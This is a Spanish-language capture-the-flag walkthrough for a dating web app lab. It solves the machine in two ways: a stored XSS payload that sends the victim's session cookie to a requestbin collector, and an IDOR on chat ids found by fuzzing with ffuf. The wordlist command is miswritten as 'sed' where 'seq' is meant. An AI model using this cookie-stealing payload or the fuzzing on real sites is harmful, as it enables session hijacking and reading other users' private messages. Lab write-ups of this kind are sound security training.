Al ingresar a la url tenemos la opcion de registrarnos e iniciar sesión que es lo primero que vamos a hacer.
Dentro podremos ver una web de citas en la que la unica persona interesante es Renata, esto debido a que nos dice que siempre esta conectada, por lo que le vamos a dar match y vamos a hablar con ella.
En este punto hay dos formas de resolver la maquina una es haciendo un Cross-Site-Scripting y la otra es modifcando la url debido a que podemos ver que cada chat tiene un id.
Vamos a mostrar la primera si tratamos de usar un titulo html en la conversacion con renata este respondera al contenido:
<h1>Hi</h1>
Vamos a tratar de conseguir la cookie de su sesion con el siguiente comando:
<script>document.location='http://requestbinLink?
c='+document.cookie</script>
Vamos a ir a esta pagina http://requestbin.whapi.cloud/ crearemos una nueva request y remplazaremos la url en el comando, si hace click en el link y recargamos la pagina de la request tendremos lo siguiente:
Remplazaremos esa cookie en el navegador usando inspeccionar y podremos ver los chats de renata junto con la flag.
Ahora vamos con la segunda forma, cuando entramos al chat de renata podemos ver como la url es:
http://94.237.55.96:37246/chat/?rid=6
Si cambiamos el valor del seis podremos ver otros chats hay una forma de probar esto de manera automatica con ffuf para verificar que sea un IDOR:
#Creamos el diccionario
sed 1 100 > id.txt
ffuf -w id.txt -u 'http://94.237.55.96:37246/chat/?rid=FUZZ' -H "Cookie: session=TUCOOKIE" -mc 200
Esto nos devolvio dos posibles chats pero uno es el nuestro por lo que si probamos con el otro tendremos nuevamente la flag.
